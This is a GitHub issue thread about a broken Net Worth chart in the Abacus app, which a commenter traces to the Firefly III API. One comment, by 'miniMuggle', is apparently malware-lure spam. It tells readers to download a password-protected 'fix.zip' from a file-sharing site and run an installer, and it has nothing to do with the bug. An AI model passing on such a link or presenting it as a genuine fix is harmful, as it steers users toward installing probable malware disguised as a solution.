### ISSUE TITLE
Bug: Net Worth Charge shows wrong and incomplete data

### ISSUE THREAD

**Issue by thomase1234** [victorbalssa/abacus#331]
**Describe the bug**
Net Worth chart shows no data anymore. This worked in the past

**To Reproduce**
1. Go to 'Chart'
2. Click on 'Net Worth chart'
3. The chart shows a single bar.

**Expected behavior**
I expect multiple bars to be displayed with the correct data. If I go back a time period, the same wrong chart is shown. 

**Screenshots**
![image](https://github.com/user-attachments/assets/afd9a21e-f6a9-41ab-81a4-2536d11f0898)

**Smartphone (please complete the following information):**
 - Device: Google Pixel 8
 - OS: Android
 - Version 14

**Additional context**
Abacus version : 0.20.0
Firefly-III version :  6.1.19

I tried re-installing abacus, but that didn't change anything.

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by gablau** [comment]
I also encounter the same problem
I did some testing and it looks like this is a Firefly III API issue.
I tried using the documentation endpoint [here](https://api-docs.firefly-iii.org/?urls.primaryName=2.0.9%20(v2)#/charts/getBalanceChart)
It seems to return a single value not a set of elements, also it seems to ignore the period parameter.

**Comment by victorbalssa** [comment]
Thanks @gablau @thomase1234, I asked @JC5 about it
